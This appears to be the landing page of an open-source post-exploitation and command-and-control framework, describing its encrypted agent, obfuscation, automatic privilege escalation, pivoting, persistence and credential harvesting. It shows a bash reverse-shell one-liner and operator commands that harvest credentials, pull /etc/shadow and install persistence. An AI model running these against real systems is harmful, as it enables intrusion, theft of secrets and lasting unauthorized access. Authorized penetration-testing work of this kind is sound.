A post-exploitation framework with encrypted C2 agent, automatic recon, privilege escalation, pivoting, and cross-platform payload generation. Built for CTF and authorized pentesting.

Go 1.24+ Linux / macOS X25519 + AES-256-GCM MIT license
Download latest View on GitHub
getting started

Install

Pre-built binaries for Linux and macOS (amd64 / arm64) are attached to every GitHub release with SHA-256 checksums. No runtime dependencies.

one-liner (latest release)
# linux/amd64
$ curl -sL https://github.com/exec/alcapwn/releases/\
latest/download/alcapwn-linux-amd64.tar.gz \
  | tar xz && sudo mv alcapwn /usr/local/bin/
build from source
$ git clone https://github.com/exec/alcapwn
$ cd alcapwn
$ go build -o alcapwn .
operator modes
$ ./alcapwn -l 0.0.0.0:4444            # TCP listener
$ ./alcapwn -l 0.0.0.0:4444 --tls       # ephemeral TLS
$ ./alcapwn -l 0.0.0.0:4444 -r          # auto-recon on connect
alcapwn> listen http 0.0.0.0:8443 --tls  # HTTPS beacon listener
capabilities

What it does

alcapwn is a post-exploitation framework that handles the full lifecycle: catch shells, deploy encrypted agents, recon targets, escalate privileges, pivot through networks, and persist access — all from one operator console managing up to 1024 sessions.

~

Encrypted C2 agent

Cross-compiled Go agent with X25519 key exchange and AES-256-GCM per-session encryption. TCP and HTTP transports with jitter, certificate pinning, and XOR config obfuscation.

@

Automatic recon

HMAC-authenticated bash recon script discovers SUID/SGID binaries, sudo rules, capabilities, cron jobs, Docker sockets, credentials, and CVEs. Parsed into structured findings in seconds.

^

Auto privilege escalation

74-entry exploit dataset covering GTFOBins, sudo, capabilities, cron, CVEs (Baron Samedit, PwnKit), Docker, and Windows privesc. exploit auto walks candidates until root.

%

Network pivoting

SOCKS5 proxy and TCP port forwarding through any session. Scan internal networks from the agent. Works with proxychains.

+

Persistence

One-command persistence via cron, bashrc, SSH key, systemd, setuid (Linux) or registry/scheduled task (Windows). Reconnecting sessions auto-label by IP.

#

Credential harvesting

Agent-side harvest of SSH keys, shell history, .env files, AWS credentials, git configs (Linux) and PowerShell history, env, SSH (Windows). Streamed back encrypted.

&

Cross-platform agents

generate linux amd64 cross-compiles agents for 6 targets (Linux amd64/arm64/armv7/i386, macOS x86_64/aarch64). Built-in minishell fallback when no system shell is available.

!

Operator security

Terminal injection defense (C1 codes, OSC 52, APC/DCS stripping), per-listener IP firewalls with CIDR, and ANSI-safe output for all remote data.

workflow

Two paths to the same console

reverse shell (PTY)
# target runs:
$ bash -i >& /dev/tcp/c2/4444 0>&1

# alcapwn auto-upgrades to PTY
# [+] Session 1 ready
generated agent (encrypted)
alcapwn> generate linux amd64 \
  --lhost 10.0.0.1 --obfuscate

# deploy agent-linux-amd64 to target
# [+] Agent 1 ready (AES-256-GCM)
# Both session types share the same operator commands:

alcapwn> recon 1               # structured recon (or -r at startup)
alcapwn> exploit auto 1        # walk all privesc candidates
# [+] ROOT via suid_python3 (euid=0)

alcapwn> creds 1              # harvest credentials
alcapwn> scan 1 10.0.0.0/24   # scan internal network from target
alcapwn> pivot 1 --socks5 1080 # SOCKS5 proxy through session
alcapwn> persist 1 systemd     # install persistence
alcapwn> use 1                # interactive shell (Ctrl+D to background)
alcapwn> download 1 /etc/shadow
alcapwn> export 1 --format json findings.json
status

Shipped and what's next

  • Agent
    Cross-platform C2 agent with encrypted transport
    Go agent for 6 targets. X25519 + AES-256-GCM. TCP and HTTP/S transports with jitter, cert pinning, reconnect.
  • Crypto
    End-to-end encrypted channels
    ECDH key exchange, HKDF-SHA256 key derivation, per-direction AES-256-GCM with AAD binding and NIST nonce limits.
  • Callbacks
    HTTP/S beacon infrastructure
    HTTP listener with custom registration/beacon paths, TLS, browser-like headers, configurable intervals and jitter.
  • Pivoting
    SOCKS5 proxy and TCP forwarding
    Route traffic through sessions to reach internal networks. Agent-side port scanning with concurrent TCP connect.
  • Obfuscation
    XOR config encoding and stripped builds
    C2 address hidden from strings(1). Builds stripped with -s -w. Custom User-Agent and URI paths for traffic blending.
  • Post-Exploit
    Credential harvesting (Linux + Windows)
    SSH keys, shell history, .env files, AWS creds, git configs, PowerShell history. Agent-side harvest, encrypted exfil.
  • Recon
    Automated recon + 74-entry exploit database
    HMAC-authenticated script, structured parser, GTFOBins/CVE matching, auto privilege escalation. Works on PTY and agent sessions.
  • Modules
    Plugin module system planned
    Loadable server/agent modules for keylogging, screenshots, clipboard access. Agent modules compiled in at generate time.
  • Staging
    Multi-stage payload delivery planned
    Stage0 dropper to stage1 loader to stage2 full agent, with integrity verification between stages.
  • Profiles
    Malleable C2 profiles planned
    Customize traffic patterns, endpoints, headers, and timing to mimic legitimate services.
  • Windows
    Windows operator console
    Platform abstractions for stdin polling and signal handling. Agent sessions already work; PTY sessions need stubs.